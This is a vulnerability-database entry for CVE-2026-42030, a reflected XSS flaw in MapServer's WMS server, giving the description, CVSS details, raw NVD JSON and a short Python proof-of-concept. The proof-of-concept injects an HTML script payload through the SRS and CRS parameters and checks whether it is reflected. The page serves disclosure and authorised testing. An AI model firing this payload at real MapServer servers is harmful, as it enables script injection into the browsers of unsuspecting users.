Security Vulnerability Report
中文
CVE-2026-42030 CVSS 6.1 MEDIUM

CVE-2026-42030

Published: 2026-05-08 17:16:31
Last Modified: 2026-05-08 22:16:31
Source: [email protected]

Description

MapServer is a system for developing web-based GIS applications. From version 6.0 to before version 8.6.2, a reflected XSS vulnerability in MapServer's WMS server allows an unauthenticated attacker to inject arbitrary HTML/JavaScript into the browser of any user who opens a crafted WMS URL. The vulnerability is triggered via FORMAT=application/openlayers combined with an unsanitized SRS parameter in WMS 1.3.0 requests. This issue has been patched in version 8.6.2.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

MapServer >= 6.0, < 8.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL of the MapServer instance target = "http://example.com/mapserv" # Malicious payload to inject xss_payload = "<img src=x onerror=alert('XSS')>" # Parameters based on the vulnerability description (WMS 1.3.0) params = { "SERVICE": "WMS", "VERSION": "1.3.0", "REQUEST": "GetMap", "FORMAT": "application/openlayers", # This format triggers the vulnerability "LAYERS": "test", "SRS": xss_payload, # The vulnerable parameter "CRS": xss_payload, # SRS is used in WMS 1.3.0 (often synonymous with CRS) "BBOX": "0,0,10,10", "WIDTH": "100", "HEIGHT": "100" } try: r = requests.get(target, params=params) if xss_payload in r.text: print("[+] Vulnerability confirmed: Payload found in response.") else: print("[-] Payload not found in response.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42030", "sourceIdentifier": "[email protected]", "published": "2026-05-08T17:16:31.307", "lastModified": "2026-05-08T22:16:30.980", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "MapServer is a system for developing web-based GIS applications. From version 6.0 to before version 8.6.2, a reflected XSS vulnerability in MapServer's WMS server allows an unauthenticated attacker to inject arbitrary HTML/JavaScript into the browser of any user who opens a crafted WMS URL. The vulnerability is triggered via FORMAT=application/openlayers combined with an unsanitized SRS parameter in WMS 1.3.0 requests. This issue has been patched in version 8.6.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}]}], "references": [{"url": "https://github.com/MapServer/MapServer/releases/tag/rel-8-6-2", "source": "[email protected]"}, {"url": "https://github.com/MapServer/MapServer/security/advisories/GHSA-4g9f-ph64-hg2x", "source": "[email protected]"}, {"url": "https://github.com/MapServer/MapServer/security/advisories/GHSA-4g9f-ph64-hg2x", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.